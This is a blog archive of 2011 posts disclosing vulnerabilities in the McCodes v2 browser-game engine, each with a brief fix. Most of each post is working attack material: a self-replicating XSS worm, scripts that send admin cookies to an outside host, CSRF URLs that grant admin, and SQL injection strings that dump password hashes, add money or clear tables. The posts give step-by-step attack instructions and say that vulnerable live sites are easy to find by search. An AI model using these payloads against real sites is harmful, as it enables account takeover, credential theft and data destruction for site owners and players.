Category Archives: McCodes

XSS Worm – Mccodes

Posted by on September 4, 2011 No comments

Previous Post on Exploit

This exploit is the result of a bad bbcode parser in the in-game forums of McCodes. I notified some owners, and some brushed me off as they didn’t think it could cause much damage.

Proof of concept:
If a user sets this as their forum signature in a vulnerable McCodes installation, every user who sees their post will have their forum signature replaced with the same exploit code, along with any payload added to it. The current payload is simply the image itself.

[img]http://i25.photobucket.com/albums/c88/jordyn7/charlie-sigh.jpg' id='uniqueimgid' onLoad='var xmlhttp;if (window.XMLHttpRequest) xmlhttp=new XMLHttpRequest();else xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");xmlhttp.open("POST", "preferences.php?action=forumchange2", true);xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");xmlhttp.send("forums_signature="+String.fromCharCode(91, 105, 109, 103, 93, 104, 116, 116, 112, 58, 47, 47, 105, 50, 53, 46, 112, 104, 111, 116, 111, 98, 117, 99, 107, 101, 116, 46, 99, 111, 109, 47, 97, 108, 98, 117, 109, 115, 47, 99, 56, 56, 47, 106, 111, 114, 100, 121, 110, 55, 47, 99, 104, 97, 114, 108, 105, 101, 45, 115, 105, 103, 104, 46, 106, 112, 103, 39, 32, 105, 100, 61, 39, 117, 110, 105, 113, 117, 101, 105, 109, 103, 105, 100, 39, 32, 111, 110, 76, 111, 97, 100, 61, 39)+document.getElementById("uniqueimgid").getAttribute("onLoad")+String.fromCharCode(91, 47, 105, 109, 103, 93));[/img]

Any kind of action can be done. You can force users to send $X to someone, force admins to grant a user admin status, render the forums unusable by embedding Nyan Cat iframes in every post, etc.

McCodes XSS – Player Reports

Posted by on March 16, 2011 No comments

In the McCodes v2 the player report feature allow you to submit both an offending player’s ID number (which is sanitized) and some text about what the player did (which is… not). The text is completely unfiltered and allows for straight up XSS injection. Since only admins read the submitted player reports, all cookies you steal will be Admin cookies.

Interesting Input Values:
Alert message:
<script>alert(1);</script>

Grab Cookies:
<script>window.location.href = ‘http://mysite.com/cookies.php?s=’ + document.cookie;</script>

Give Admin:
<script>window.location.href = ‘staff_special.php?action=userlevel&ID=1&level=2′;</script>

To Attack:
1) Go to preport.php
2) Input interesting value for “What they’ve done”
3) Wait for an admin to visit staff_users.php?action=reportsview

To fix:
You need to sanitize user input better. PHP’s strip_tags function should help against this particular attack.
$_POST['report'] = strip_tags($_POST['report']);

Many websites are vulnerable to this exploit. A simple google search for a default phrase on the login page brings up a list of websites with McCodes v2 installed, most of which are not patched (since there are no official patches).

General Info (mainly for Search Engines):
XSS can happen as a result of unfiltered input. The McCodes Game Engine v2 is vulnerable to several exploits / injections / hacks.

McCodes SQL Injection – GET/POST Item Market

Posted by on March 16, 2011 No comments

McCodes updates the Item Market in a “buy” action like so, without sanitizing the $_GET['ID'] variable:

$db->query(“DELETE FROM itemmarket WHERE imID={$_GET['ID']}”);

It also updates the “gift1″ action in a similar method, though one page longer – it first accepts a variable as a GET, embeds in as a hidden field in a form, them submits it in a POST.

To Inject:
There’s not too much we can do with this query as there are several ‘checkpoints’ it must pass (such as there being a valid item for sale that has been selected with our ID as input, the user having enough money for that item, etc.) So… let’s just empty the items table and keep it simple.

Example value:
Clears item market: itemmarket.php?action=buy&ID=0 or imID>0–
Clears item market: itemmarket.php?action=gift1&ID=0 or imID>0– (just click Submit)

To fix:
Sanitize the variable.

$_GET['ID'] = abs((int) $_GET['ID']);

Many websites are vulnerable to this exploit. A simple google search for a default phrase on the login page brings up a list of websites with McCodes v2 installed, most of which are not patched (since there are no official patches).

General Info (mainly for Search Engines):
SQL Injection can result from ANY user input. This includes GET requests, POST requests, Cookies, and Headers, to name a few. The McCodes Game Engine v2 is vulnerable to several exploits / injections / hacks.

McCodes XSS – Forum Signature

Posted by on March 16, 2011 No comments

In the McCodes v2 Forum Signature, html is disabled but a bad BBcode parser is enabled. Moreover, stripslashes is run on your input, so even though they escape your input when storing it in the database, it’s not escaped when it’s shown in the forum pages!

Interesting Input Values:
Alert message:
[img]title.jpg’ onLoad=”alert(1);”[/img]

Grab Cookies:
[img]title.jpg’ onLoad=”window.location.href = ‘http://mysite.com/cookies.php?s=’ + document.cookie;” width=’1[/img]

Give Admin:
[img]title.jpg’ onLoad=”window.location.href = ‘staff_special.php?action=userlevel&ID=1&level=2′” width=’1[/img]

To Attack:
1) Go to preferences.php?action=forumchange
2) Input interesting value for your Signature
3) Wait for a user to visit your forum post

To fix:
You need to sanitize user input better. I’d suggest getting a better BBCode parser, as well as encoding all html characters better.

Many websites are vulnerable to this exploit. A simple google search for a default phrase on the login page brings up a list of websites with McCodes v2 installed, most of which are not patched (since there are no official patches).

General Info (mainly for Search Engines):
XSS can happen as a result of unfiltered input. The McCodes Game Engine v2 is vulnerable to several exploits / injections / hacks.

McCodes CSRF – Profile Images

Posted by on March 16, 2011 No comments

This is a stored CSRF flaw.

On the McCodes v2 Preferences page, you are able to input a URL that links to a picture hosted somewhere online.
Once you do so, whenever somebody visits your profile (or views one of your forum posts), part of the page displayed will be an image tag with the url as a SRC.

This allows an attacker to input any GET request driven script on that McCodes site as if they were another user, forcing users to do whatever the attacker wants. Note that for some values (like the staff_special.php call below) the user visiting your profile (or forum post) must be logged in as an admin.

Interesting Input Values:
Logs users out: logout.php
Sends item ID 1 to user ID 2: itemsend.php?ID=1&user=2&qty=1
Make user ID 1 Admin: staff_special.php?action=userlevel&ID=1&level=2

To Attack:
1) Go to preferences.php?action=picchange (for profile pictures) or preferences.php?action=forumchange (for forum avatar)
2) Input interesting value
3) Wait for a user to visit your profile (e.g. viewuser.php?u=1) or forum post

To fix:

  • Switch GET to POST
  • Check referral header
  • Issue tokens for user actions (requires major rewriting of McCodes)

Many websites are vulnerable to this exploit. A simple google search for a default phrase on the login page brings up a list of websites with McCodes v2 installed, most of which are not patched (since there are no official patches).

General Info (mainly for Search Engines):
CSRF can happen many different ways. For the McCodes game engine, it can only easily happen on scripts that are driven by GET events. The McCodes Game Engine v2 is vulnerable to several exploits / injections / hacks.

McCodes SQL Injection – GET Crystal Market Part 2

Posted by on March 15, 2011 No comments

McCodes updates the Crystal Market in a “buy” action like so, without sanitizing the $_GET['ID'] variable:

$q=$db->query(“SELECT * FROM crystalmarket cm WHERE cmID={$_GET['ID']}”);
$r=$db->fetch_row($q);

$db->query(“UPDATE users SET crystals=crystals+{$r['cmQTY']} where userid=$userid”);

To Inject:
The crystalmarket table in the database looks like so:
`crystalmarket` (
`cmID` int(11),
`cmQTY` int(11),
`cmADDER` int(11),
`cmPRICE` int(11),
) ;
Moreover, the value selected from crystalmarket is then updated within the user table. Unfortunately, we cannot pass a string because McCodes has addslashes enabled on all $_GET and $_POST… or can we?
We can, using the CHAR command.
SELECT CHAR(57,57,57,57,57,44,109,111,110,101,121,61,109,111,110,101,121,43,53) outputs:
99999,money=money+5

EDIT: Other options that also select the same string:
SELECT UNHEX( ’39393939392C6D6F6E65793D6D6F6E65792B35′ )
SELECT 0x39393939392C6D6F6E65793D6D6F6E65792B35

Example values:

Adds $5 to your account:
cmarket.php?action=remove&ID=2 union all select 1,CHAR(57,57,57,57,57,44,109,111,110,101,121,61,109,111,110,101,121,43,53),0,0 –

Makes you an admin:
cmarket.php?action=remove&ID=2 union all select 1,CHAR(57,57,57,57,57,44,117,115,101,114,95,108,101,118,101,108,61,50),0,0 –

To fix:
Sanitize the variable.

$_GET['ID'] = abs((int) $_GET['ID']);

Many websites are vulnerable to this exploit. A simple google search for a default phrase on the login page brings up a list of websites with McCodes v2 installed, most of which are not patched (since there are no official patches).

General Info (mainly for Search Engines):
SQL Injection can result from ANY user input. This includes GET requests, POST requests, Cookies, and Headers, to name a few. The McCodes Game Engine v2 is vulnerable to several exploits / injections / hacks.

McCodes SQL Injection – GET Forums

Posted by on March 15, 2011 No comments

McCodes default forums have a thread ID that is passed via GET when a reply is posted – and it’s not sanitized.

$q=$db->query(“SELECT * FROM forum_topics WHERE ft_id={$_GET['reply']}”);
$topic=$db->fetch_row($q);
$q2=$db->query(“SELECT * FROM forum_forums WHERE ff_id={$topic['ft_forum_id']}”);

To Inject:
First we put a nonsense ID that returns 0 rows. Then we do a union with a select statement of our own choosing. However… union requires the same number of columns in the two tables being put into union. No problem though! We just select one column repeatedly until we get the correct number of columns. As shown in the example below, even though you are only selecting one distinct column, you are selecting four columns total.
Select login_name,login_name,login_name,login_name FROM users where userid = 1

Example values:

//shows login name of userid=1
forums.php?reply=0 union all select login_name,login_name,login_name,
login_name,login_name,login_name,login_name,login_name,login_name,
login_name,login_name,login_name,login_name from users where userid=1

//shows md5 encoded password of userid=1
forums.php?reply=0 union all select userpass,userpass,userpass,userpass,userpass,
userpass,userpass,userpass,userpass,userpass,userpass,userpass,
userpass from users where userid=1

To fix:
Sanitize the variable.

$_GET['reply'] = abs((int) $_GET['reply']);

Many websites are vulnerable to this exploit. A simple google search for a default phrase on the login page brings up a list of websites with McCodes v2 installed, most of which are not patched (since there are no official patches).

General Info (mainly for Search Engines):
SQL Injection can result from ANY user input. This includes GET requests, POST requests, Cookies, and Headers, to name a few. The McCodes Game Engine v2 is vulnerable to several exploits / injections / hacks.

McCodes SQL Injection – GET Crystal Market Part 1

Posted by on March 15, 2011 No comments

McCodes updates the Crystal Market in a “buy” action like so, without sanitizing the $_GET['ID'] variable:

$q=$db->query(“SELECT * FROM crystalmarket cm WHERE cmID={$_GET['ID']}”);

To Inject:
The crystalmarket table in the database looks like so:
`crystalmarket` (
`cmID` int(11),
`cmQTY` int(11),
`cmADDER` int(11),
`cmPRICE` int(11),
) ;
So let’s put in a nonsense value that returns 0 rows, following by a union with a select statement that will select the values we want. The cmID doesn’t matter, the cmQTY we presumably want a lot of, cmADDER can be anyone (but to avoid suspicion one can put an ID number that doesn’t exist like 0 or negative), and cmPRICE we want to be 0 (so it doesn’t cost us anything).

Example value:
cmarket.php?action=buy&ID=2 union all select 1,99999999,0,0
cmarket.php?action=remove&ID=2 union all select 1,99999999,0,0 –

To fix:
Sanitize the variable.

$_GET['ID'] = abs((int) $_GET['ID']);

Many websites are vulnerable to this exploit. A simple google search for a default phrase on the login page brings up a list of websites with McCodes v2 installed, most of which are not patched (since there are no official patches).

General Info (mainly for Search Engines):
SQL Injection can result from ANY user input. This includes GET requests, POST requests, Cookies, and Headers, to name a few. The McCodes Game Engine v2 is vulnerable to several exploits / injections / hacks.

McCodes SQL Injection – IP Header

Posted by on March 15, 2011 No comments

McCodes gets an IP Address like so:

$IP = ($_SERVER['HTTP_X_FORWARDED_FOR'])
? $_SERVER['HTTP_X_FORWARDED_FOR']
: $_SERVER['REMOTE_ADDR'];

And then immediately uses it in a SQL Query without sanitizing the $IP.

$db->query(“UPDATE users SET lastip_login=’$IP’,last_login=unix_timestamp() WHERE userid={$mem['userid']}”);

To Inject:
Download the Modify Headers add-on for Firefox. Change the X-Forwarded-For header value to something of your choosing.

Example value:
1′, user_level=’2′,money=1337, username=’bob

To fix:
Either sanitize the $IP variable, or change it to a server input (instead of client input).

$IP = $_SERVER['REMOTE_ADDR'];

Many websites are vulnerable to this exploit. A simple google search for a default phrase on the login page brings up a list of websites with McCodes v2 installed, most of which are not patched (since there are no official patches).

General Info (mainly for Search Engines):
SQL Injection can result from ANY user input. This includes GET requests, POST requests, Cookies, and Headers, to name a few. The McCodes Game Engine v2 is vulnerable to several exploits / injections / hacks.